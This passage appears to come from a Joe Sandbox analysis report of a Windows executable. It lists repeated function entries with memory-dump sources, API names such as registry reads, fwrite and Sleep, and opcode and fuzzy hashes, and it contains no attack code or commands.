                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: e6d6454d9d8ed6389c828c79f8ce65ad1eb9fe4b924b38bced701f5c03ddeb45
                    • Instruction ID: c0b707f234b4df7c3ccf6817a33467e7db5c3181a6a165151b784822f1704088
                    • Opcode Fuzzy Hash: e6d6454d9d8ed6389c828c79f8ce65ad1eb9fe4b924b38bced701f5c03ddeb45
                    • Instruction Fuzzy Hash: D7F09C5260C60692E5619F88BC807B67354AF467D4F480176DF4D466A0EF3DDB499700
                    Function 00007FF8BA5089AE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 1683aa44052c06ac712ff3a27e6fe50b9ff14011bc9dd6c1858f5456d2b15749
                    • Instruction ID: 5127b45b4583536379e1959dcba5bac7d522acbb8b647fd0901029fadbe85a85
                    • Opcode Fuzzy Hash: 1683aa44052c06ac712ff3a27e6fe50b9ff14011bc9dd6c1858f5456d2b15749
                    • Instruction Fuzzy Hash: 66F09C5260C60692E5629F88BC807B67354EF467D4F480176DF4D466A0EF3DDB499300
                    Function 00007FF8BA508A38 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 335d1d3817ec4d55ff377caf703831ab7f6be45e12ce3a8728bfb007799e5078
                    • Instruction ID: d1952aa4c8ab7641c3edd1fe42c01a5f9f47da2b12f5df745562d7c8c1f7c879
                    • Opcode Fuzzy Hash: 335d1d3817ec4d55ff377caf703831ab7f6be45e12ce3a8728bfb007799e5078
                    • Instruction Fuzzy Hash: 71F09C5260C70692E5619F88BC807B67354BF457D4F484276DF8D466A0EF3DDB899300
                    Function 00007FF708875938 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 84507be4a4de6d467d6f1ceb591116e6e33086f4e66504b08abdaae3ee9167ed
                    • Instruction ID: eca2cf48737985f710688437618f97a8a1ba8256b562f0fb1424e9f54add26dd
                    • Opcode Fuzzy Hash: 84507be4a4de6d467d6f1ceb591116e6e33086f4e66504b08abdaae3ee9167ed
                    • Instruction Fuzzy Hash: 48F0966262870782F652EF04BD80BB9E264FF407A4F880236ED5D466D1DF3DD9E99318
                    Function 00007FF7088758AE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: ecfad8fd3af469c49ddfd4974a27326ec12363b3caf6cddb9e7d44f65fa213f7
                    • Instruction ID: c7be4428fad18808d80711deac258b9d9738c9255512fd916065382880c9c01b
                    • Opcode Fuzzy Hash: ecfad8fd3af469c49ddfd4974a27326ec12363b3caf6cddb9e7d44f65fa213f7
                    • Instruction Fuzzy Hash: CDF0FC2262830742F652EF00BD80B79E254EF40794F840136DD5D462D0DF3CD9D99314
                    Function 00007FF7088758BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 1ef01ad073160347b9336122c58a1bb31a20614d72c9cdcb911e51d8656fb6c7
                    • Instruction ID: 0f071fbc21bd0a0e6df3010d0e0122144b98f6a98976b1ce5d7ec84d73c36a64
                    • Opcode Fuzzy Hash: 1ef01ad073160347b9336122c58a1bb31a20614d72c9cdcb911e51d8656fb6c7
                    • Instruction Fuzzy Hash: 38F0FC2262830742F652EF00BD80B79E254EF40794F840136DD5D466D0DF3CD9D99314
                    Function 00007FF708875827 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 8a306065cf7652f2ea88d6f8cf3679f0c48f79bc5049da17eabc2150b7eef19c
                    • Instruction ID: b13c15c18aef203c085ac27fc41825eff324cc53fdf5f02f63caa034dd4c7842
                    • Opcode Fuzzy Hash: 8a306065cf7652f2ea88d6f8cf3679f0c48f79bc5049da17eabc2150b7eef19c
                    • Instruction Fuzzy Hash: F1F09C6262870742F652EF04BD80B79E254FF40794F840135DD5D466D1DF3DD9D99314
                    Function 00007FF70887581D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 8cfc696cedb4df67d3dd9865147946229a73ea3b819559de613cfabccd486ad9
                    • Instruction ID: 79426812dd101f5763b7258bb303216b6f9ebc2a024cd141a00fa34d74c2c0eb
                    • Opcode Fuzzy Hash: 8cfc696cedb4df67d3dd9865147946229a73ea3b819559de613cfabccd486ad9
                    • Instruction Fuzzy Hash: AAF0FC2262830742F652EF00BD80B79E254EF40794F840235DD5D462D1DF3CD9D99314
                    Function 00007FF8B918268D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 0ca799fca6bbcb1757cbcc2dcca85249b25f476f8fa3a6e87312bd06e934d07b
                    • Instruction ID: 3ad469e133cbf741c7e98f467054f27528fef1372f08fb528ad6300068a82333
                    • Opcode Fuzzy Hash: 0ca799fca6bbcb1757cbcc2dcca85249b25f476f8fa3a6e87312bd06e934d07b
                    • Instruction Fuzzy Hash: 58F0F622A0878642E5538F0CB8803757244BF407E4F494635DF5D46691EF3DD986B300
                    Function 00007FF8B9182697 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 5aa2f7c8573c3de0365c04b7b97fedeb54286f0fb7594e79099b212bd57f958c
                    • Instruction ID: 3cd975793e2593f46408d791bc155c68050fe39c0051fd6262389bd36191b347
                    • Opcode Fuzzy Hash: 5aa2f7c8573c3de0365c04b7b97fedeb54286f0fb7594e79099b212bd57f958c
                    • Instruction Fuzzy Hash: E3F0F022A0868642E6538F0CBC803B97244BF407E4F49463AEF5D46691EF3DDA8AB300
                    Function 00007FF8B918271E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: b64ba499165d0bf9f2a6abbdea868e445e23a4ee5814657b89a818d1230dab7a
                    • Instruction ID: acbda8544bbe563e28de5675648f70b184f3252f1e5b5923a141e5ae3e835372
                    • Opcode Fuzzy Hash: b64ba499165d0bf9f2a6abbdea868e445e23a4ee5814657b89a818d1230dab7a
                    • Instruction Fuzzy Hash: F5F0F622A0878642E5538F0CBC803757244FF407E4F494536DF5D46691DF3DDA86B300
                    Function 00007FF8B918272C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: b925a896082f3cbac8f85682289c0623576caa08c1e2f56db9f14118f2be1eb2
                    • Instruction ID: b0d9de61a816731c9345bbd97bc40bc011f2dbb4d13bec58fe18848e7f7ef728
                    • Opcode Fuzzy Hash: b925a896082f3cbac8f85682289c0623576caa08c1e2f56db9f14118f2be1eb2
                    • Instruction Fuzzy Hash: 39F0F622A0878642E5538F0CB8803757244BF407E4F494536DF5D46691DF3DD986B300
                    Function 00007FF8B91827A8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 56f8f947741124c32929831f6305df564f095b6d9a6d9a0b39bb5ff756825751
                    • Instruction ID: d163a41e2158c5c0ca51e3a5e43e51b2ad2e369288e8e6a8c2261f9dc8896303
                    • Opcode Fuzzy Hash: 56f8f947741124c32929831f6305df564f095b6d9a6d9a0b39bb5ff756825751
                    • Instruction Fuzzy Hash: C4F09662A0878642E6538F0CB8807757255BF407E4F494635DF5D46695DF3DD98AB300
                    Function 00007FF8BFB5364A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: Sleepmemcpy
                    • String ID:
                    • API String ID: 1125407320-0
                    • Opcode ID: 992cbff283cf5bc95ae1a3ea0b4319c7fbf54e715062f432e6d1e15d965cf2f6
                    • Instruction ID: 9379432b5bc0e6ab582c44bcf956020c76fd09851529afa3726c9ddb959def9e
                    • Opcode Fuzzy Hash: 992cbff283cf5bc95ae1a3ea0b4319c7fbf54e715062f432e6d1e15d965cf2f6
                    • Instruction Fuzzy Hash: 1B315962E0C64292FA609BECE8A52787352AF447F0F18033AD77D067E1DE2CF555A650
                    Function 00007FF8BFB89B0A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: Sleepmemcpy
                    • String ID:
                    • API String ID: 1125407320-0
                    • Opcode ID: b87abd954e14124bfefb60d04ef0fd2187e4f04c7771b26ba7a85592d234dd00
                    • Instruction ID: c6bc02626b61f004f88f23012105a7d6373844b016c3c864ea471cb8de1c5aaf
                    • Opcode Fuzzy Hash: b87abd954e14124bfefb60d04ef0fd2187e4f04c7771b26ba7a85592d234dd00
                    • Instruction Fuzzy Hash: 0E315C25E0D75B82FA6097EDE8882782355AFC1BF4F144331D77E46AE2DE2DA841D600
                    Function 00007FF8B915184A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: Sleepmemcpy
                    • String ID:
                    • API String ID: 1125407320-0
                    • Opcode ID: 3d3b53d04c772b8df934e6e75b7e7394d6e1c1ef4915e661cc7242475e802ccf
                    • Instruction ID: 3b5380edf9031800730bb6fd5d6ffaf9694a42cf0b797924d49445e63259c68a
                    • Opcode Fuzzy Hash: 3d3b53d04c772b8df934e6e75b7e7394d6e1c1ef4915e661cc7242475e802ccf
                    • Instruction Fuzzy Hash: B8312B25E0868392F6325FACE8942782251AF443F0F214735DB7D466E5CE2CF98AF640
                    Function 00007FF8BA50184A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: Sleepmemcpy
                    • String ID:
                    • API String ID: 1125407320-0
                    • Opcode ID: a353561d76903494636ec477018f7265d0b2c6ffd32db1de9122ce1526666027
                    • Instruction ID: d1a462df975887e93967b91da92761532a1896bcfd601919c564c3e66f57ef1c
                    • Opcode Fuzzy Hash: a353561d76903494636ec477018f7265d0b2c6ffd32db1de9122ce1526666027
                    • Instruction Fuzzy Hash: 2E31F520E0C60692F6305BEDAC8427A6251BF463F0F5007B6DF7D466F1DE2CEB459641
                    Function 00007FF8B918EF2A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: Sleepmemcpy
                    • String ID:
                    • API String ID: 1125407320-0
                    • Opcode ID: 0cb8941dfc163a413c5ab916b78a3d17a0994cdb19c6253a22ed711d911a51f6
                    • Instruction ID: 0d92a77e8aa1d7bbe763f043219c3183562da79cfec2b515fd25baf78f50a1ac
                    • Opcode Fuzzy Hash: 0cb8941dfc163a413c5ab916b78a3d17a0994cdb19c6253a22ed711d911a51f6
                    • Instruction Fuzzy Hash: 30312120E1C68283F630AF2CE8C52792652AF457F0F650331EB7D566E3DE2DA9467781
                    Function 00007FF70887886D Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00007FF708871360: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF7088784AF), ref: 00007FF70887137E
                    • SleepEx.KERNEL32 ref: 00007FF7088788DC
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: HandleModuleSleep
                    • String ID:
                    • API String ID: 1071907932-0
                    • Opcode ID: 979f6ab677c7687cb865241237432280adb0046b4e29c36f948d58921f5010c4
